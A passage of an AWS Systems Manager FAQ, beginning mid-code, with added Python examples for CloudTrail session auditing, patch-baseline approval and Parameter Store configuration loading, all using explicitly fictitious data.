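                findings.append("MinRequiredApprovals exceeds the number of approvers")
    return findings


def start_execution_request(document_name, resource_group, max_concurrency="3", max_errors="1"):
    """Arguments for ssm.start_automation_execution() that run the playbook across a resource group."""
    return {
        "DocumentName": document_name,
        "TargetParameterName": "InstanceId",   # parameter each target's ID is fed into
        "Targets": [{"Key": "ResourceGroup", "Values": [resource_group]}],
        "MaxConcurrency": max_concurrency,      # instances in flight at once
        "MaxErrors": max_errors,                # stop dispatching new targets after this many failures
    }


if __name__ == "__main__":
    print("lint:", lint_playbook(RESTART_WITH_APPROVAL) or "clean")
    print(json.dumps(start_execution_request("RestartWithApproval", "web-tier"), indent=2))
```

The `allowedPattern` on InstanceId and the approval gate are the two controls that matter here: the first stops a caller from steering the restart at an unintended resource, and the second puts a named principal between the request and the change.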
Q: What is AWS Systems Manager run command?
AWS Systems Manager provides safe, secure remote management of your instances at scale without logging into your servers, replacing the need for bastion hosts, SSH, or remote PowerShell. It provides a simple way of automating common administrative tasks across groups of instances such as registry edits, user management, and software and patch installations. Through integration with AWS Identity and Access Management (IAM), you can apply granular permissions to control the actions users can perform on instances. Every Systems Manager API call, including each SendCommand with its document name, parameters, and targets, is recorded by AWS CloudTrail, allowing you to audit changes throughout your environment; the commands' own output is retained only if you configure Run Command to send it to Amazon S3 or Amazon CloudWatch Logs.
Q: Does AWS provide any predefined commands?
Yes. There are predefined commands available which are designed to help with commonly used administrative tasks. For Windows, you can run a PowerShell or shell command or script, configure Windows Update settings, deploy an MSI application, and more. For Linux, you can run any shell command or script and remotely update the installed agent. You can also create custom commands to perform common tasks required for your environment.
Q: Can I make bulk changes across my environments?
Yes. You can act against large groups of instances by targeting using tag based queries. You can propagate changes safely across your environments by setting up rate control, which allows you to specify simultaneous execution batches with error thresholds.
Q: Can I control who can execute a command?
Yes. Using the published AWS Identity and Access Management (IAM) permissions and policies, you can use tag-based permissions to control who has access to execute commands or documents on specific instances. For example, you can specify an IAM user who can run PowerShell commands, but not join an instance to a domain. Another IAM user can only be given access to run a very specific command, like restarting services, giving you the flexibility to specify how much access any given user can have.
Q: What is Session Manager?
Session Manager is a fully managed capability that provides you with an interactive browser-based shell and CLI experience. It provides secure and auditable instance management without the need to open inbound ports, maintain bastion hosts, or manage SSH keys. Session Manager helps you comply with corporate policies that require controlled access to instances and increases the security and auditability of instance access, while giving end users simple, cross-platform access to instances.
Q: What are the benefits of using Session Manager?
Session Manager improves your security posture by not requiring you to open inbound ports or to maintain SSH keys or certificates on your instances. It also centralizes access to instances using AWS Identity and Access Management (IAM). Once Session Manager is set up, you can connect to any Linux or Windows EC2 instance that runs the SSM Agent and has an instance profile granting the Systems Manager permissions (for example, the AmazonSSMManagedInstanceCore managed policy), and track each user who started a session on each instance. You can audit which user accessed an instance and when using AWS CloudTrail, and, once session logging is enabled in the Session Manager preferences, record every command executed during a session to Amazon S3 or Amazon CloudWatch Logs. Finally, with Session Manager you don't need up-front investments to operate and maintain bastion hosts.
Q: Who should use Session Manager?
Any AWS customer who wants to improve their security and audit posture, reduce operational overhead by centralizing access control on instances, and reduce inbound instance access will benefit from Session Manager. Information security teams who want to monitor and track instance access and activity, close down inbound ports on instances, or connect to instances without a public IP will benefit from Session Manager. Administrators who want to grant and revoke access from a single place and provide one solution for Windows and Linux instances to users will benefit as well. Finally, operators can get started quickly by selecting an instance in the browser and clicking to start a session, or by using the CLI, without having to provide SSH keys.
Q: What features are offered by Session Manager?
You can start a session to a Linux or Windows EC2 instance from the AWS Management Console, the AWS CLI (which requires the Session Manager plugin), or any of the AWS SDKs. You can grant and revoke user access to instances using tag-based permissions in AWS IAM, and then audit who started or ended a session using AWS CloudTrail. All actions performed during a session can be logged to Amazon S3 or Amazon CloudWatch Logs for later analysis.
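The audit trail described in the last two answers is built from CloudTrail records. As an added example (not code from the page or from AWS), the script below reconstructs sessions from a handful of constructed CloudTrail records: it pairs StartSession with TerminateSession by sessionId, lists sessions that were never terminated, and pulls out StartSession calls that IAM denied. The records follow the shape of CloudTrail's ssm.amazonaws.com events, but every principal, instance ID, session ID and address in them is made up. Note that CloudTrail holds only the control-plane calls; the commands a user typed are in the S3 or CloudWatch Logs session logs, not in CloudTrail.

```python
"""Reconstruct Session Manager access from CloudTrail (added example, not AWS code).

Session Manager control-plane calls land in CloudTrail under eventSource
ssm.amazonaws.com. The records below are constructed to follow that shape;
all values are fictitious.
"""
import json
from datetime import datetime, timezone

CLOUDTRAIL_JSONL = r'''
{"eventTime":"2024-03-01T09:00:10Z","eventSource":"ssm.amazonaws.com","eventName":"StartSession","sourceIPAddress":"203.0.113.5","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::123456789012:user/alice"},"requestParameters":{"target":"i-0a1b2c3d4e5f67890"},"responseElements":{"sessionId":"alice-0f1e2d3c4b5a6978"}}
{"eventTime":"2024-03-01T09:12:30Z","eventSource":"ssm.amazonaws.com","eventName":"TerminateSession","sourceIPAddress":"203.0.113.5","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::123456789012:user/alice"},"requestParameters":{"sessionId":"alice-0f1e2d3c4b5a6978"},"responseElements":{"sessionId":"alice-0f1e2d3c4b5a6978"}}
{"eventTime":"2024-03-01T22:41:05Z","eventSource":"ssm.amazonaws.com","eventName":"StartSession","sourceIPAddress":"198.51.100.23","userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::123456789012:assumed-role/OpsRole/bob"},"requestParameters":{"target":"i-0fedcba9876543210"},"responseElements":{"sessionId":"bob-5a6b7c8d9e0f1a2b"}}
{"eventTime":"2024-03-01T23:02:11Z","eventSource":"ssm.amazonaws.com","eventName":"StartSession","sourceIPAddress":"192.0.2.77","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::123456789012:user/mallory"},"requestParameters":{"target":"i-0fedcba9876543210"},"errorCode":"AccessDeniedException","errorMessage":"User: arn:aws:iam::123456789012:user/mallory is not authorized to perform: ssm:StartSession on resource: arn:aws:ec2:us-east-1:123456789012:instance/i-0fedcba9876543210","responseElements":null}
{"eventTime":"2024-03-01T23:05:00Z","eventSource":"ec2.amazonaws.com","eventName":"DescribeInstances","sourceIPAddress":"192.0.2.77","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::123456789012:user/mallory"},"requestParameters":{},"responseElements":null}
'''


def parse_records(jsonl):
    """One CloudTrail record per non-empty line."""
    return [json.loads(line) for line in jsonl.strip().splitlines() if line.strip()]


def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def reconstruct_sessions(records):
    """sessionId -> {principal, target, source_ip, start, end}; end is None while open."""
    sessions = {}
    for r in records:
        if r.get("eventSource") != "ssm.amazonaws.com" or r.get("errorCode"):
            continue  # not Session Manager, or the call failed and created no session
        if r["eventName"] == "StartSession":
            sid = r["responseElements"]["sessionId"]
            sessions[sid] = {
                "principal": r["userIdentity"]["arn"],
                "target": r["requestParameters"]["target"],
                "source_ip": r["sourceIPAddress"],
                "start": _ts(r["eventTime"]),
                "end": None,
            }
        elif r["eventName"] == "TerminateSession":
            sid = r["requestParameters"]["sessionId"]
            if sid in sessions:
                sessions[sid]["end"] = _ts(r["eventTime"])
    return sessions


def open_sessions(sessions):
    """Sessions with a StartSession but no matching TerminateSession."""
    return sorted(sid for sid, s in sessions.items() if s["end"] is None)


def session_seconds(session):
    if session["end"] is None:
        return None
    return int((session["end"] - session["start"]).total_seconds())


def denied_session_attempts(records):
    """(principal, target, source_ip) for StartSession calls that IAM rejected."""
    return [
        (r["userIdentity"]["arn"], r["requestParameters"].get("target"), r["sourceIPAddress"])
        for r in records
        if r.get("eventSource") == "ssm.amazonaws.com"
        and r["eventName"] == "StartSession"
        and r.get("errorCode") == "AccessDeniedException"
    ]


if __name__ == "__main__":
    recs = parse_records(CLOUDTRAIL_JSONL)
    sessions = reconstruct_sessions(recs)
    for sid, s in sessions.items():
        print(sid, s["principal"], s["target"], session_seconds(s))
    print("still open:", open_sessions(sessions))
    print("denied:", denied_session_attempts(recs))
```

In practice the same logic runs over CloudTrail Lake or Athena rather than a string literal, but the pairing key (sessionId from responseElements on StartSession, from requestParameters on TerminateSession) and the errorCode filter are the parts worth keeping.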
Q: How much does Session Manager cost?
Session Manager is available at no additional cost to manage Amazon EC2 instances.
Q: What is AWS Systems Manager patch manager?
AWS Systems Manager helps you select and deploy operating system and software patches automatically across large groups of Amazon EC2 or on-premises instances. Through patch baselines, you can set rules to auto-approve select categories of patches to be installed, such as operating system or high severity patches, and you can specify a list of patches that override these rules and are automatically approved or rejected. You can also schedule maintenance windows for your patches so that they are only applied during preset times. Systems Manager helps ensure that your software is up-to-date and meets your compliance policies.
Q: How do I specify when I want to patch an instance?
You can use an AWS Systems Manager maintenance window to define when patching occurs. AWS Systems Manager lets you define one or more recurring windows of time during which it is acceptable for your maintenance to occur. By defining these windows and associating your instances with them, it is easier to ensure that maintenance activities which may affect the availability of a workload are performed during a well-defined window of time.
Q: How do I customize the patching process?
AWS Systems Manager provides a fully automated patching process. You can customize it by writing your own AWS Systems Manager command or Automation document, for example to add pre-patch and post-patch steps around the default patching document.
Q: How do I pick the patches I want to install?
Patch baselines define the set of patches you have approved or blocked for deployment to your instances. In a patch baseline, you select patches by product (e.g., Windows Server 2008, Windows Server 2012, etc.), classification (e.g., critical updates, security updates, etc.), and severity. For each approval rule you then define an auto-approval delay: the number of days after a patch's release after which matching patches are automatically approved for deployment. In addition to the rules, you can specify explicit lists of approved and rejected patches that are always installed or always blocked, respectively. At the time of patching, AWS Systems Manager assesses targeted instances only for the patches that have been approved prior to that point in time.
Q: How do I view the compliance levels of my instances?
You can view patch compliance information, which gives you the detailed results of the patching process. From the AWS Systems Manager console or APIs, you can get aggregate compliance details per instance. You can also drill in further: for each instance you can determine which patches are installed, missing, not applicable, and which failed to install.
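The two answers above (how patches are picked, and how compliance is reported) come together in the following added example, which is not code from the page or from AWS. It applies a constructed baseline (two approval rules with different delays, plus explicit approved and rejected lists) to a constructed patch catalogue as of a given date, then splits the approved set into Installed and Missing for one instance. Real baselines filter on operating-system-specific keys and can treat rejected patches as allowed-as-dependency; this model uses Classification and Severity only and treats a rejected patch as blocked.

```python
"""Model of patch baseline approval and compliance (added example, not AWS code).

Approval rules say which classifications/severities are auto-approved and how
many days after release; explicit approved and rejected lists override the
rules, with rejection winning. Filter keys differ per operating system in the
real service; this example uses Classification and Severity only.
"""
from datetime import date, timedelta

BASELINE = {
    "ApprovalRules": [
        # Critical and Important security fixes: approved the day they are released.
        {"Classification": ["Security"], "Severity": ["Critical", "Important"], "ApproveAfterDays": 0},
        # Everything else security- or bugfix-related: wait a week for regressions to surface.
        {"Classification": ["Security", "Bugfix"], "Severity": ["*"], "ApproveAfterDays": 7},
    ],
    "ApprovedPatches": ["bind-9.16.1"],      # always approved, rules or not
    "RejectedPatches": ["openssh-9.0-1"],    # never approved, even if a rule matches
}

# Constructed catalogue; the fields mirror what a baseline filters on.
CATALOGUE = [
    {"Id": "kernel-6.1.80",  "Classification": "Security",    "Severity": "Critical", "ReleaseDate": date(2024, 3, 14)},
    {"Id": "curl-8.6.0",     "Classification": "Security",    "Severity": "Moderate", "ReleaseDate": date(2024, 3, 12)},
    {"Id": "glibc-2.37-5",   "Classification": "Bugfix",      "Severity": "Low",      "ReleaseDate": date(2024, 3, 1)},
    {"Id": "openssh-9.0-1",  "Classification": "Security",    "Severity": "Critical", "ReleaseDate": date(2024, 3, 10)},
    {"Id": "bind-9.16.1",    "Classification": "Enhancement", "Severity": "None",     "ReleaseDate": date(2024, 3, 14)},
    {"Id": "vim-9.1",        "Classification": "Enhancement", "Severity": "Low",      "ReleaseDate": date(2024, 1, 1)},
]


def _matches(rule_values, value):
    return "*" in rule_values or value in rule_values


def approved_patches(baseline, catalogue, on):
    """Ids approved for deployment as of `on` (a date or ISO string), in catalogue order."""
    if isinstance(on, str):
        on = date.fromisoformat(on)
    approved = []
    for patch in catalogue:
        if patch["Id"] in baseline["RejectedPatches"]:
            continue  # rejection wins over everything else
        if patch["Id"] in baseline["ApprovedPatches"]:
            approved.append(patch["Id"])
            continue
        for rule in baseline["ApprovalRules"]:
            if (_matches(rule["Classification"], patch["Classification"])
                    and _matches(rule["Severity"], patch["Severity"])
                    and patch["ReleaseDate"] + timedelta(days=rule["ApproveAfterDays"]) <= on):
                approved.append(patch["Id"])
                break
    return approved


def compliance(approved, installed):
    """Split the approved set by what an instance reports as installed."""
    missing = [p for p in approved if p not in installed]
    return {
        "Installed": [p for p in approved if p in installed],
        "Missing": missing,
        "Compliant": not missing,
    }


if __name__ == "__main__":
    approved = approved_patches(BASELINE, CATALOGUE, "2024-03-15")
    print("approved:", approved)
    print(compliance(approved, {"kernel-6.1.80", "vim-9.1"}))
```

The date-dependence is the point: the same baseline yields a different approved set on 2024-03-19 than on 2024-03-15 because curl's seven-day delay has elapsed, which is why a scan that ran last week is not evidence of compliance today.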
Q: What is an AWS Systems Manager maintenance window?
AWS Systems Manager lets you schedule windows of time to run administrative and maintenance tasks across your instances. This ensures that you can select a convenient and safe time to install patches and updates or make other configuration changes, improving the availability and reliability of your services and applications.
Q: Why should I use AWS Systems Manager maintenance windows?
AWS Systems Manager maintenance windows help improve the availability and reliability of your workloads by performing potentially disruptive tasks automatically in a well-defined window of time, so that the impact of the maintenance itself, or of a change that fails, is confined to a period you have planned for.
Q: What tasks can I perform using an AWS Systems Manager maintenance window?
You can perform tasks like the following:
- Installing applications, updating patches, installing or updating AWS Systems Manager agents, or executing PowerShell commands and Linux shell scripts.
- Building Amazon Machine Images (AMIs), boot-strapping software, and configuring instances.
- Executing AWS Lambda functions that trigger additional actions such as scanning your instances for patch updates.
- Running AWS Step Functions state machines to perform tasks such as removing an instance from an Elastic Load Balancing target group, patching the instance, and then adding the instance back.
Q: What are the types of schedules I can choose for my AWS Systems Manager maintenance windows?
AWS Systems Manager maintenance windows can be scheduled for a recurring date (e.g., weekly on Tuesdays at 22:00:00 or the first Sunday of every month at 22:00:00). You define the schedule using a cron or rate expression; for example, cron(0 22 ? * TUE *) for Tuesdays at 22:00, cron(0 22 ? * SUN#1 *) for the first Sunday of each month, or rate(7 days) for once a week. Times are interpreted in UTC unless you set a schedule time zone for the window.
Q: What is AWS Systems Manager Distributor?
Distributor is an AWS Systems Manager feature that enables you to securely store and distribute software packages in your organization. You can use Distributor with existing Systems Manager features like Run Command and State Manager to control the lifecycle of the packages running on your instances.
Q: What are the benefits of using Distributor?
Distributor helps you scale software package rollouts by enabling standardization of package distribution. By using Distributor with AWS Systems Manager Run Command and State Manager, you eliminate the need to build and maintain your own package distribution and installation tooling. Distributor also simplifies software package management by using a centralized repository for all of your packages. Distributor supports the use of IAM policies, providing full control over who can create and update packages. Distributor also helps enable secure software package distribution, because your packages are encrypted in storage and all communication between Distributor and your instance is signed and encrypted.
Q: Who should use Distributor?
Any AWS customer who regularly distributes software packages and wants a secure way to scale package management, a centralized repository for packages, or to eliminate the need for self-maintained distribution tooling should use Distributor. IT professionals who want to control who can create or update software packages and which versions are distributed to each AWS account will benefit from Distributor.
Q: Does Distributor require the use of the SSM Agent?
Yes. Getting started with Distributor requires the use of the latest version of the SSM Agent. The SSM Agent is open-sourced and available on GitHub. The SSM Agent is also installed by default on Amazon Linux, Amazon Linux 2, Windows, and Ubuntu AMIs.
Q: What is AWS Systems Manager state manager?
AWS Systems Manager provides configuration management, which helps you maintain consistent configuration of your Amazon EC2 or on-premises instances. With Systems Manager, you can control configuration details such as server configurations, anti-virus definitions, firewall settings, and more. You can define configuration policies for your servers through the AWS Management Console or use existing scripts, PowerShell modules, or Ansible playbooks directly from GitHub or Amazon S3 buckets. Systems Manager automatically applies your configurations across your instances at a time and frequency that you define. You can query Systems Manager at any time to view the status of your instance configurations, giving you on-demand visibility into your compliance status.
Q: Why should I use AWS Systems Manager state manager?
Ensuring that the infrastructure that is powering your applications is consistent is a challenge. AWS Systems Manager allows you to create policies, reapply these policies to prevent configuration drift, and monitor the status of your intended state.
Q: How do I create my policies?
Policies are created as AWS Systems Manager documents. In addition, predefined documents are available for common configurations such as installing applications, joining instances to a domain, and so on.
Q: What are the targets that can be configured?
You can target individual instances or groups of instances selected by tag. This lets you apply specific configurations to groups of instances, such as all of your web servers.
Q: Can I use my existing configuration management tools with AWS Systems Manager state manager?
Yes. AWS provides pre-defined AWS Systems Manager documents to run Ansible playbooks or Salt States, and you can use PowerShell DSC on your instances using AWS Systems Manager state manager to mitigate configuration drift. In addition, you can also directly run any configuration scripts from your public or private GitHub repository.
Q: What is AWS Systems Manager parameter store?
AWS Systems Manager provides a centralized store to manage your configuration data, whether plain-text data such as database strings or secrets such as passwords. This allows you to separate your secrets and configuration data from your code. Parameters can be tagged and organized into hierarchies, helping you manage parameters more easily. For example, you can use the same parameter name, "db-string", under different hierarchical paths, "/dev/db-string" and "/prod/db-string", to store different values. Systems Manager is integrated with AWS Key Management Service (KMS), allowing you to automatically encrypt the data you store. You can also control user and resource access to parameters using AWS Identity and Access Management (IAM). Parameters can be referenced from other AWS services, such as Amazon Elastic Container Service, AWS Lambda, and AWS CloudFormation.
Q: Why should I use AWS Systems Manager parameter store?
It is a best practice to store configuration data and secrets separately from your code. You can use AWS Systems Manager parameter store to quickly store and reference configuration and sensitive information. Rather than storing data in config files or referencing them in plain text, you can store and obtain this information in your applications or scripts. Additionally, you control who has access to parameters so that only the right set of users has access to the appropriate information.
Q: How do you store sensitive data?
A secure string is any sensitive data that needs to be stored and referenced in a secure manner. If you have data that you do not want users to see in clear text, or data that could be tampered with or misused, store it as a SecureString parameter in AWS Systems Manager parameter store. The value is encrypted with AWS Key Management Service (KMS), using either a customer managed KMS key of your own or the AWS managed key for Systems Manager (aws/ssm) in your account. With a customer managed key, a caller also needs kms:Decrypt on that key to read the value, which gives you a second control point in addition to the IAM permission on the parameter.
Q: Can I track usage and provide access control to specific parameters?
Yes. You can provide granular access control through customized permissions to users and resources (such as instances) for parameters access using AWS Identity and Access Management (IAM). This means you can control who can access which parameter on what resource. You can also set up Amazon CloudWatch Events rules based on parameter change events. Additionally, you can also track and audit parameter API calls using AWS CloudTrail.
Q: Can I track changes to parameters?
Yes, you can see the history of parameter changes. Each change automatically increments the parameter's version number, and you can look up a specific value by its version, or by a label you attach to a version.
Q: Can I store hierarchical data as parameters?
Yes, you can use a hierarchical structure to store parameters. You can also control and audit access at every level of the hierarchy.
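The hierarchy and access-control answers above describe what Parameter Store offers; the following added example (not code from the page or from AWS) shows how an application consumes it. It loads /<app>/common and then /<app>/<env>, letting the environment branch override common values, walks GetParametersByPath with pagination (the API returns at most 10 parameters per page), asks for SecureString values to be decrypted, and remembers which keys came from SecureString parameters so they can be masked before the configuration is logged. FakeSSM is a stand-in for a boto3 SSM client with the same call and response shape as get_parameters_by_path; the parameter tree is constructed for the example.

```python
"""Hierarchical configuration from Parameter Store (added example, not AWS code).

FakeSSM stands in for boto3's ssm client and implements only
get_parameters_by_path, with boto3's argument names and response shape, over a
constructed in-memory parameter tree.
"""


class FakeSSM:
    """Minimal stand-in for boto3's ssm client (constructed data, no network)."""

    def __init__(self, params):
        self._params = params  # name -> (type, plaintext value, version)

    def get_parameters_by_path(self, Path, Recursive=False, WithDecryption=False,
                               MaxResults=10, NextToken=None):
        prefix = Path.rstrip("/") + "/"
        names = sorted(
            n for n in self._params
            if n.startswith(prefix) and (Recursive or "/" not in n[len(prefix):])
        )
        start = int(NextToken) if NextToken else 0
        page = []
        for name in names[start:start + MaxResults]:
            ptype, value, version = self._params[name]
            if ptype == "SecureString" and not WithDecryption:
                value = "AQICAHh...ciphertext..."  # a KMS ciphertext blob stands in here
            page.append({"Name": name, "Type": ptype, "Value": value, "Version": version})
        response = {"Parameters": page}
        if start + MaxResults < len(names):
            response["NextToken"] = str(start + MaxResults)
        return response


def iter_parameters(ssm, path, decrypt=True):
    """Yield every parameter under path, following NextToken until exhausted."""
    token = None
    while True:
        kwargs = {"Path": path, "Recursive": True, "WithDecryption": decrypt, "MaxResults": 10}
        if token:
            kwargs["NextToken"] = token
        response = ssm.get_parameters_by_path(**kwargs)
        yield from response["Parameters"]
        token = response.get("NextToken")
        if not token:
            return


def load_config(ssm, app, env):
    """Return (config, secret_keys): common values overlaid by env-specific ones."""
    config, secret_keys = {}, set()
    for branch in (f"/{app}/common", f"/{app}/{env}"):
        for param in iter_parameters(ssm, branch):
            key = param["Name"][len(branch) + 1:]  # path relative to the branch
            config[key] = param["Value"]
            if param["Type"] == "SecureString":
                secret_keys.add(key)
    return config, secret_keys


def redacted(config, secret_keys):
    """Copy of config that is safe to log: SecureString-sourced values masked."""
    return {k: ("<redacted>" if k in secret_keys else v) for k, v in config.items()}


# Constructed parameter tree (name -> (type, value, version)); values are fictitious.
PARAMS = {
    "/myapp/common/db-host": ("String", "db.internal", 1),
    "/myapp/common/db-string": ("SecureString", "postgres://app:commonpw@db.internal/app", 3),
    "/myapp/prod/db-string": ("SecureString", "postgres://app:prodpw@db.internal/app", 2),
    "/myapp/prod/log-level": ("String", "WARN", 1),
    "/myapp/dev/log-level": ("String", "DEBUG", 1),
    "/myapp-legacy/common/db-host": ("String", "old.internal", 1),  # sibling tree, must not leak in
}
PARAMS.update({f"/myapp/common/feature/flag{i}": ("String", "on" if i % 2 else "off", 1)
               for i in range(12)})

if __name__ == "__main__":
    cfg, secrets = load_config(FakeSSM(PARAMS), "myapp", "prod")
    print(redacted(cfg, secrets))
```

With a real client (boto3.client("ssm")) the loop in iter_parameters can be replaced by ssm.get_paginator("get_parameters_by_path"); everything else stays the same. The prefix handling matters for access control as well as correctness: an IAM policy scoped to arn:aws:ssm:*:*:parameter/myapp/prod/* does not cover /myapp-legacy/, and neither should the loader.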
Q: What is the difference between Secrets Manager and Parameter Store?
AWS Secrets Manager is a service to manage the lifecycle for the secrets used in your organization centrally including rotation, audit, and access control. Secrets Manager helps you meet your security and compliance requirements by enabling you to rotate secrets automatically. Secrets Manager offers built-in integration for MySQL, PostgreSQL, and Amazon Aurora on Amazon RDS that's extensible to other types of secrets by customizing Lambda functions.
AWS Systems Manager Parameter Store provides secure, hierarchical storage for configuration data management, which can include secrets. Data such as database connection strings, passwords, and license codes can be stored as parameter values and can be audited and access controlled. Values stored can be either plain text or encrypted data. You can then reference values by using the unique name of the parameter. You can reference Systems Manager parameters to build generic configuration and automation scripts for use across AWS services such as Amazon ECS and AWS CloudFormation.
Q: Should I use Parameter Store or Secrets Manager?
If you want a single store for configuration and secrets, you can use Parameter Store. If you want a dedicated secrets store with lifecycle management, use Secrets Manager. Standard parameters in Parameter Store are available at no additional charge, with a limit of 10,000 parameters per account per Region. Refer to the Secrets Manager pricing page for pricing details.
Q: Is there a difference in the security model of Parameter Store and Secrets Manager?
No. Both Secrets Manager and Parameter Store are equally secure when used as intended: both support encryption at rest using customer managed KMS keys, and both are access-controlled through IAM and audited through CloudTrail. One difference to keep in mind is that in Parameter Store only SecureString parameters are encrypted with your KMS key; a plain String parameter is readable by any principal with ssm:GetParameter on it, so secrets must always be stored as SecureString. For more information on how Parameter Store uses KMS, see the KMS Developer Guide section on how Parameter Store uses AWS KMS.
Q: Can I use Secrets Manager with Parameter Store?
Yes. You can reference a Secrets Manager secret through Parameter Store by calling GetParameter or GetParameters with the reserved /aws/reference/secretsmanager/ prefix followed by the secret name or ARN; the caller still needs permission to read the secret in Secrets Manager.
Q: What are advanced parameters?
Advanced parameters provide enhanced capabilities such as more than 10,000 parameters per account per Region, a larger parameter value size (up to 8 KB, versus 4 KB for standard parameters), and parameter policies such as expiration and no-change notification. The expiration policy lets you specify an expiration date and time. The no-change notification policy helps you track parameters that have not changed for a specified period of time. Advanced parameters are priced for storage per month and per API interaction. See the pricing page for details.
Q: Can I convert between standard and advanced parameter types?
A standard parameter may be converted into an advanced parameter at any time. Advanced parameters cannot be converted into standard parameters. If an advanced parameter’s enhanced capabilities are no longer required or you no longer want to incur charges for that parameter, you must delete the advanced parameter and then create a new parameter as a standard parameter.
Q: Can I increase the API throughput for Parameter Store?
Yes, API throughput can be raised to a higher limit from the Parameter Store settings tab. API throughput limits apply per Region per account. The increased throughput limit incurs charges; see the pricing page for details. If you no longer need increased throughput, you can reset the limit at any time from the Settings tab.